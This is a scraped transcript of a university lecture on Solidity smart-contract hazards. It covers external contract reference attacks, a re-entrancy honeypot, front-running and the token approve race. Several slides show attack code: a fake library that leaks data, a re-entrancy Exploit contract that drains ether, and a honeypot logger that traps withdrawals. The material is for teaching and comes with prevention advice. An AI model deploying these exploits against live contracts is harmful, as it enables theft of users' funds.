Presentation is loading. Please wait.

Presentation is loading. Please wait.

Solidity Pitfalls and Hazards

Published byFinn Claussen Modified over 5 years ago

Similar presentations

Presentation on theme: "Solidity Pitfalls and Hazards"— Presentation transcript:

1 Solidity Pitfalls and Hazards
(Part Three) CS1951 L Spring 2019 28 February 2019 Maurice Herlihy Brown University

2 External Contract References
Today’s Pitfalls: External Contract References Race Conditions

3 External Contract Reference Attack
Contract addresses are untyped You might not be calling the contract you think

4 Simple Encryption Library
Example contract EncryptionContract { Rot13Encryption encryptionLibrary; constructor( Rot13Encryption _encryptionLibrary) { encryptionLibrary = _encryptionLibrary; } function encryptPrivateData(string data) { encryptionLibrary.rot13Encrypt(data); Simple Encryption Library

5 Example contract EncryptionContract {
Rot13Encryption encryptionLibrary; constructor( Rot13Encryption _encryptionLibrary) { encryptionLibrary = _encryptionLibrary; } function encryptPrivateData(string data) { encryptionLibrary.rot13Encrypt(data); encryption library address

6 Example contract EncryptionContract {
Rot13Encryption encryptionLibrary; constructor( Rot13Encryption _encryptionLibrary) { encryptionLibrary = _encryptionLibrary; } function encryptPrivateData(string data) { encryptionLibrary.rot13Encrypt(data); library address passed in by constructor

7 Example contract EncryptionContract {
Rot13Encryption encryptionLibrary; constructor( Rot13Encryption _encryptionLibrary) { encryptionLibrary = _encryptionLibrary; } function encryptPrivateData(string data) { encryptionLibrary.rot13Encrypt(data); library address called by function

8 Adversary’s Encryption Library
contract FakeEncryption{ event Print(string text); function rot13Encrypt(string text) public { emit Print(text); } Fake Library that Leaks Sensitive Data

9 Adversary’s Deployment
contract EvilDriver { FakeEncryption fake = new FakeEncryption(); EncryptionContract eContract = new EncryptionContract( Rot13Encryption(address(fake))); }

10 Adversary’s Deployment
contract EvilDriver { FakeEncryption fake = new FakeEncryption(); EncryptionContract eContract = new EncryptionContract( Rot13Encryption(address(fake))); } Create fake encryption library

11 Adversary’s Deployment
contract EvilDriver { FakeEncryption fake = new FakeEncryption(); EncryptionContract eContract = new EncryptionContract( Rot13Encryption(address(fake))); } Cast fake library type to real library type Solidity’s feeble type system no match for Evil!

12 Adversary’s Deployment
contract EvilDriver { FakeEncryption fake = new FakeEncryption(); EncryptionContract eContract = new EncryptionContract( Rot13Encryption(address(fake))); } Initialize contract with fake encryption library All your secrets are now belong to us!

13 True Story from Reddit “While randomly browsing some contracts on Etherscan, I stumbled on this contract”

14 Also vanilla logging library, not shown
contract Private_Bank { mapping (address => uint) public balances; uint public MinDeposit = 1 ether; Log TransferLog; function Private_Bank(address _log) { } function Deposit() public payable { function withdraw(uint _am) { Simple Bank Also vanilla logging library, not shown

15 contract Private_Bank {
mapping (address => uint) public balances; uint public MinDeposit = 1 ether; Log TransferLog; function Private_Bank(address _log) { } function Deposit() public payable { function withdraw(uint _am) { depositors’ balances

16 contract Private_Bank {
mapping (address => uint) public balances; uint public MinDeposit = 1 ether; Log TransferLog; function Private_Bank(address _log) { } function Deposit() public payable { function withdraw(uint _am) { minimum deposit

17 contract Private_Bank {
mapping (address => uint) public balances; uint public MinDeposit = 1 ether; Log TransferLog; function Private_Bank(address _log) { } function Deposit() public payable { function withdraw(uint _am) { library to format log of events

18 contract Private_Bank {
function Private_Bank(address _log) { TransferLog = Log(_log); } constructor initializes logging library

19 contract Private_Bank {
function Deposit() public payable { if (msg.value >= MinDeposit) { balances[msg.sender]+=msg.value; TransferLog.AddMessage( msg.sender, msg.value, "Deposit"); } Deposit tracks value, logs deposit

20 contract Private_Bank {
function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage( msg.sender, _am, "withdraw"); } withdraw checks balance, sends ETH, updates balance, … oh, wait …

21 Re-entrancy vulnerability!!!
contract Private_Bank { function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage( msg.sender, _am, "withdraw"); } Re-entrancy vulnerability!!!

22 “I can have some fun and try out this hack, and give the funds back to the contract creator later.”
True Story from Reddit

23 “There's 1 ETH in there, so it should be a fun challenge, maybe do a victorious blog post later”
True Story from Reddit

24 contract Exploit { function tryIt() public payable { target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) {

25 contract Exploit { function tryIt() public payable { target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { Deposit ether so we have something to withdraw

26 contract Exploit { function tryIt() public payable { target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { Withdraw, exploiting re-entrancy vulnerability

27 contract Exploit { function tryIt() public payable { target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { Keep going, until we have 2 ether

28 “It didn't work. The ETH got stuck in his contract
“It didn't work! The ETH got stuck in his contract. … What's funny is that … the ETH was transferred to his contract, then two transfers … to my exploit contract, however it didn't get anything…” True Story from Reddit

29 Honey Pot

30 contract Private_Bank {
function Private_Bank(address _log) { TransferLog = Log(_log); } constructor initializes logging library

31 But not that library! contract Private_Bank { …
function Private_Bank(address _log) { TransferLog = Log(_log); } constructor initializes logging library But not that library!

32 contract HoneyPotLogLOL {
function AddMessage(address _adr, uint _val, string _data) public { if (_data == “withdraw” && msg.sender != owner) { revert(); }

33 contract HoneyPotLogLOL {
function AddMessage(address _adr, uint _val, string _data) public { if (_data == “withdraw” && msg.sender != owner) { revert(); } Non-owner wants to cash out? BOOM, revert!

34 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); }

35 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); } First withdrawal function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}}

36 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); } function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}} Balance good

37 ETH to fallback function
function tryIt() public payable { target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { target.withdraw(1 ether); } function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}}

38 re-entrant withdraw call
function tryIt() public payable { target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { target.withdraw(1 ether); } re-entrant withdraw call function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}} function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}}

39 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { target.withdraw(1 ether); } call returns function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}} function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}}

40 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); } re-entrancy ends function () public payable if (this.balance < 2 ether) { target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { target.withdraw(1 ether); } function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}} function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}}

41 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { target.withdraw(1 ether); } function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}} function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}} call returns

42 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { target.withdraw(1 ether); } function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}} function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}} reverts, undoes transfer

43 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); } function () public payable if (this.balance < 2 ether) { target.withdraw(1 ether); } reverts function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}}

44 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); } call does not propagate revert, just returns false function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}}

45 function tryIt() public payable {
target.deposit.value(1 ether)(); target.withdraw(1 ether); } function withdraw(uint _am) { if (_am<=balances[msg.sender]) { if (msg.sender.call.value(_am)()) { balances[msg.sender]-=_am; TransferLog.AddMessage(…); }}} test fails, no transfer, returns

46 transaction completes but nothing transferred!
function tryIt() public payable { target.deposit.value(1 ether)(); target.withdraw(1 ether); } transaction completes “successfully”, but nothing transferred!

47 Prevention constructor() { encryptionLibrary =
new Rot13Encryption(); } Use new to create contracts

48 Prevention address constant Rot13Encryption =
0xcafecafecafecafecafecafecafe…; Hardcode Addresses when Possible

49 This Happened

50 Race Conditions Miners choose transaction order based on gasPrice
Attacker can monitor pool and contract state … and insert transactions in block before victim’s

51 “Find This Hash” Game contract FindThisHash {
contract FindThisHash { bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f f9a3ecd7f44d5479b630ee0a; constructor() public payable {} // load with ether function solve(string solution) public { // If you can find the pre image of the hash, receive 1000 ether require(hash == sha3(solution)); msg.sender.transfer(1000 ether); } } contract FindThisHash { bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f f9a3ecd7f44d5479b630ee0a; constructor() public payable {} // load with ether function solve(string solution) public { // If you can find the pre image of the hash, receive 1000 ether require(hash == sha3(solution)); msg.sender.transfer(1000 ether); } } “Find This Hash” Game contract FindThisHash { bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f f9a3ecd7f44d5479b630ee0a; constructor() public payable {} function solve(string solution) public { require(hash == sha3(solution)); msg.sender.transfer(1000 ether); }

52 “Find This Hash” Game contract FindThisHash {
contract FindThisHash { bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f f9a3ecd7f44d5479b630ee0a; constructor() public payable {} // load with ether function solve(string solution) public { // If you can find the pre image of the hash, receive 1000 ether require(hash == sha3(solution)); msg.sender.transfer(1000 ether); } } contract FindThisHash { bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f f9a3ecd7f44d5479b630ee0a; constructor() public payable {} // load with ether function solve(string solution) public { // If you can find the pre image of the hash, receive 1000 ether require(hash == sha3(solution)); msg.sender.transfer(1000 ether); } } “Find This Hash” Game contract FindThisHash { bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f f9a3ecd7f44d5479b630ee0a; constructor() public payable {} function solve(string solution) public { require(hash == sha3(solution)); msg.sender.transfer(1000 ether); } Load with ether

53 “Find This Hash” Game contract FindThisHash {
contract FindThisHash { bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f f9a3ecd7f44d5479b630ee0a; constructor() public payable {} // load with ether function solve(string solution) public { // If you can find the pre image of the hash, receive 1000 ether require(hash == sha3(solution)); msg.sender.transfer(1000 ether); } } contract FindThisHash { bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f f9a3ecd7f44d5479b630ee0a; constructor() public payable {} // load with ether function solve(string solution) public { // If you can find the pre image of the hash, receive 1000 ether require(hash == sha3(solution)); msg.sender.transfer(1000 ether); } } “Find This Hash” Game contract FindThisHash { bytes32 constant public hash = 0xb5b5b97fafd9855eec9b41f74dfb6c38f f9a3ecd7f44d5479b630ee0a; constructor() public payable {} function solve(string solution) public { require(hash == sha3(solution)); msg.sender.transfer(1000 ether); } Earn 1000 ether if you can find preimage of hash

54 Alice realizes solution is “Ethereum!”
She calls FTHContract.solve(“Ethereum!”) Bob sees her transaction, validates answer, and resubmits with much higher gasPrice Most likely, miners will order Bob’s transaction before Alice’s

55 Prevention Contracts can put upper bound on gasPrice
Does not protect against abuse by miners

56 Prevention Parties use commit-reveal scheme Commit to bid with hash
After transaction complete, reveal hash preimage Prevents both miners and users from frontrunning Does not hide transaction value

57 This Happened Standard for tradeable tokens Widely used for ICOs
Market cap about $40 Billion

58 I am willing to allow this party …
… to withdraw this amount … … from my account.

59 Alice authorizes Bob to withdraw $100 Alice Bob miner

60 Alice authorizes Bob to withdraw $100 Alice miner Bob I am Bob’s
secret friend miner

61 adversarial scheduler
Alice authorizes Bob to withdraw $100 Alice Bob Think of me as an adversarial scheduler miner

62 Miner, please change Bob’s
authorization to $50 Alice authorizes Bob to withdraw $100 Alice !!! !!! Bob miner

63 Miner, please authorize Bob for $50
Alice authorizes Bob to withdraw $100 Miner, please authorize Bob for $50 Bob withdraws $100 Alice Heh-heh… Heh-heh… Bob miner

64 Miner, please authorize Bob for $50
Alice authorizes Bob to withdraw $100 Miner, please authorize Bob for $50 Bob withdraws $100 Alice Alice authorizes Bob to withdraw $50 Got $100 Bob miner

65 Miner, please authorize Bob for $50
Alice authorizes Bob to withdraw $100 Miner, please authorize Bob for $50 Bob withdraws $100 Alice Alice authorizes Bob to withdraw $50 Bob withdraws $50 Got $150 Bob miner

66 Problem is non-atomic “read then write”

67 One fix is to turn approve into a “compare-and-swap-like” operation

68 External Contract References
Ideas we covered in this lecture External Contract References Race Conditions

69

Download ppt "Solidity Pitfalls and Hazards"

Similar presentations

MFA for Business Banking – Security Code Multifactor Authentication: Quick Tip Sheets Note to Financial Institutions: We are providing these QT sheets.

MFA for Business Banking – Security Code Multifactor Authentication: Quick Tip Sheets Note to Financial Institutions: We are providing these QT sheets.
Building Bucks Basic Financial Services. Financial Institutions 3 Main Types – Banks – Credit Unions – Savings and Loan Associations (S&L) Advantages.

Building Bucks Basic Financial Services. Financial Institutions 3 Main Types – Banks – Credit Unions – Savings and Loan Associations (S&L) Advantages.
Secure Multiparty Computations on Bitcoin

Secure Multiparty Computations on Bitcoin
ITIS 6200/8200. 2 Secure multiparty computation – Alice has x, Bob has y, we want to calculate f(x, y) without disclosing the values – We can only do.

ITIS 6200/ Secure multiparty computation – Alice has x, Bob has y, we want to calculate f(x, y) without disclosing the values – We can only do.
Digital Signatures and Hash Functions. Digital Signatures.

Digital Signatures and Hash Functions. Digital Signatures.
Payment Systems 1. Electronic Payment Schemes Schemes for electronic payment are multi-party protocols Payment instrument modeled by electronic coin that.

Payment Systems 1. Electronic Payment Schemes Schemes for electronic payment are multi-party protocols Payment instrument modeled by electronic coin that.
Chapter 19, Lesson 3 Saving and Investing.

Chapter 19, Lesson 3 Saving and Investing.
Introduction to Modern Cryptography, Lecture 13 Money Related Issues ($$$) and Odds and Ends.

Introduction to Modern Cryptography, Lecture 13 Money Related Issues ($$$) and Odds and Ends.
Oblivious Transfer based on the McEliece Assumptions

Oblivious Transfer based on the McEliece Assumptions
ITIS 6200/8200. time-stamping services Difficult to verify the creation date and accurate contents of a digital file Required properties of time-stamping.

ITIS 6200/8200. time-stamping services Difficult to verify the creation date and accurate contents of a digital file Required properties of time-stamping.
CMSC 414 Computer and Network Security Lecture 19 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 19 Jonathan Katz.
Chapter 5 The Banking System

Chapter 5 The Banking System
Chapters 29 & 30 Checking and Savings Accounts. Thinking Questions Are you saving money for something you want or need? How do you keep track of your.

Chapters 29 & 30 Checking and Savings Accounts. Thinking Questions Are you saving money for something you want or need? How do you keep track of your.
Financial Literacy Part I. Spending We live in a world where the pressure to spend money is constant. You are surrounded by ads. And advertisers are now.

Financial Literacy Part I. Spending We live in a world where the pressure to spend money is constant. You are surrounded by ads. And advertisers are now.
Saving and Investing Mr. Mizak Economics Fall 2009.

Saving and Investing Mr. Mizak Economics Fall 2009.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.

Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
CS 346 – Chapter 8 Main memory –Addressing –Swapping –Allocation and fragmentation –Paging –Segmentation Commitment –Please finish chapter 8.

CS 346 – Chapter 8 Main memory –Addressing –Swapping –Allocation and fragmentation –Paging –Segmentation Commitment –Please finish chapter 8.
 CONVENIENT  HELPS YOU KEEP TRACK OF MONEY: USING THE CHECK REGISTER OR ONLINE BANKING  SAVES YOU MONEY – EXPENSES ARE LESS THAN MONEY ORDERS.

 CONVENIENT  HELPS YOU KEEP TRACK OF MONEY: USING THE CHECK REGISTER OR ONLINE BANKING  SAVES YOU MONEY – EXPENSES ARE LESS THAN MONEY ORDERS.
McGraw-Hill/Irwin ©2008 The McGraw-Hill Companies, All Rights Reserved Chapter Twelve Managing and Pricing Deposit Services.

McGraw-Hill/Irwin ©2008 The McGraw-Hill Companies, All Rights Reserved Chapter Twelve Managing and Pricing Deposit Services.
Day 1 Terms of the Day 1. Financial- having to do with money 2. Financial Management- how you manage your money 3. Financial Goal- something you wish.

Day 1 Terms of the Day 1. Financial- having to do with money 2. Financial Management- how you manage your money 3. Financial Goal- something you wish.

Similar presentations

Ads by Google